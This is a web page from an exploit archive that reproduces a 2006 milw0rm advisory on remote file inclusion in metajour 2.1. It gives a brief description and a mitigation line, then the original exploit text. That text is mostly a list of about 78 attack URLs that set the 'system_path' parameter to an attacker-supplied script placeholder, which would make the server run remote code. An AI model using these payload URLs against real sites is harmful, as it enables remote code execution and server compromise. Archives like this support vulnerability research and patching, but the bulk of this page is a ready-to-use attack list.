header-logo
Suggest Exploit
vendor:
metajour
by:
Kacper (Rahim)
5.5
CVSS
MEDIUM
Remote File Include
CWE
Product Name: metajour
Affected Version From: metajour 2.1
Affected Version To: metajour 2.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

metajour 2.1 (system_path) – Remote File Include Vulnerabilities

The metajour 2.1 script is vulnerable to remote file inclusion attacks. An attacker can include malicious scripts by manipulating the 'system_path' parameter in various PHP files.

Mitigation:

Update to a patched version of the metajour script or apply appropriate input validation checks to the 'system_path' parameter.
Source

Exploit-DB raw data:

################ DEVIL TEAM THE BEST POLISH TEAM #################
#
# metajour 2.1 (system_path) - Remote File Include Vulnerabilities
# Script site: http://www.metajour.org
# Find by Kacper (Rahim).
# Greetings; DragonHeart, Satan, Leito, Leon, Luzak, Adam, DeathSpeed, Drzewko, pepi ;-)
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Special greetz DragonHeart :***
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
#
##################################################################
expl:

http://www.site.com/[metajour_path]/app/edocument/edocument_basic_view_menu.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/edocument_document_model_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/edocument_document_view_list.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listactive.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/edocument_edocform_view_listclosed.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/core/edocument_edoccorrectionclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocerrorcodeclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocformclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/edocument/core/edocument_edocresponsibleclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_basic_view_menu.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_layoutelement_view_init.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_model_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_combi.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listactive.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_project_view_listclosed.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/eproject_projectelement_model_update.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/core/eproject_layoutelementclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/eproject/core/eproject_projectelementclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_basic_view_menu.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseawait.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseclose.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_casedone.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_caseopen.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_model_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_combi.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_create.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listactive.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listawait.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listclosed.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_listdone.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/erek_comp_view_search.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compcauseclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compcountryclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compdecisionclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compdepartmentclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compsolutionclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/app/erek/core/erek_compunitclass.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/basicextension.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/article/article.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/article/article.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/breadcrumb/breadcrumb.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/bulletinboard/bulletinboard.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/cform/cform.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/cform/cform.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/changepassword/changepassword.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/filelist/filelist.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/filelist/filelist.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/forgottenpassword/forgottenpassword.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/forum/forum.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/forum/forum.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/forum/forumdata.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/gallery/gallery.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/gallery/gallery.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/index/index.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/indexadv/indexadv.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listcomment/listcomment.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listing/listing.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listing/listing.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listing/listing_view_combidialog.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listlatestdoc/listlatestdoc.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/listpopulardoc/listpopulardoc.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/login/login.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/menu/menu.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/online/online.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/register/register.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/related/related.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/search/search.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/search/search.datatype.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/shop/shop.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/sitemap/sitemap.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/sitemap/sitemap.datatype.php?GLOBALS[system_path]=[evil_scripts]
http://www.site.com/[metajour_path]/extension/slide/slide.class.php?system_path=[evil_scripts]
http://www.site.com/[metajour_path]/extension/uptodate/uptodate.class.php?system_path=[evil_scripts]

#Elo ;-)

# milw0rm.com [2006-05-31]

Navigation

Suggest Exploit

Services By CQR